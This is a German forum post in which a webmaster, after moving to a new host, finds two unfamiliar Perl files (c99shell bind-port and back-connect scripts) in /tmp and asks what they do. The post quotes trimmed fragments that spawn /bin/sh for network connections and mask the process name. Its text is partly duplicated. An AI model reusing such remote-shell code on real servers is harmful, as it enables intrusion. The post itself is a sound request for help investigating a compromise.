Tweet
Hi leute ich bin jetzt schon vor ein paar tagen zu
einem neuen Webhost gewechselt und habe jetzt
meinen Halten durchsucht und alles unwichtige schon mal dort vom
Server gelöscht.
und wie ich so alles durchsuche finde Ich da im /tmp 2 .pl Datein die nicht von mir sind.
Hab mir die Dann herunter geladen um sie mir mal anzusehen:
c99sh_bindport.pl
und c99sh_backconn.pl
kann mir wer sagen was diese Datein machen sollen , bzw wie die da hin gekommen sind, kann ja theoretisch nur durch einen PHP upload passiert sein. Aber keines meine Scripte sollte .pl Datein zulassen und überhaupt die Dateien die es Hochlädt im tmp ordner lassen ... und sonst ist auch nichts von einem Hackversuch zu sehen. (obwohl ich mich aus den Logs von vor 4 Monaten erinnere das versuche statt fanden ( suche nach weitverbreiteten und Fehlerhaften Scripts. aber ohne erfolg))
Find ich irgendwie sehr komisch ....
Edit: Hab jetzt den Code unütz gemacht, damit ihn niemand von hier verwenden kann.
einem neuen Webhost gewechselt und habe jetzt
meinen Halten durchsucht und alles unwichtige schon mal dort vom
Server gelöscht.
und wie ich so alles durchsuche finde Ich da im /tmp 2 .pl Datein die nicht von mir sind.
Hab mir die Dann herunter geladen um sie mir mal anzusehen:
c99sh_bindport.pl
PHP-Code:
#!/usr/bin/perl
if (@ARGV < 1) {exit(1);}
$port = $ARGV[0];
exit if fork;
....
...
open STDOUT, ">&X";
open STDERR, ">&X";
exec("echo \"Welcome to c99shell!\r\n\r\n\"");
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, "<&X";
open STDOUT, ">&X";
close X;
exec("/bin/sh");
}
close X;
}
PHP-Code:
a#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
......
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
Find ich irgendwie sehr komisch ....
Edit: Hab jetzt den Code unütz gemacht, damit ihn niemand von hier verwenden kann.
Kommentar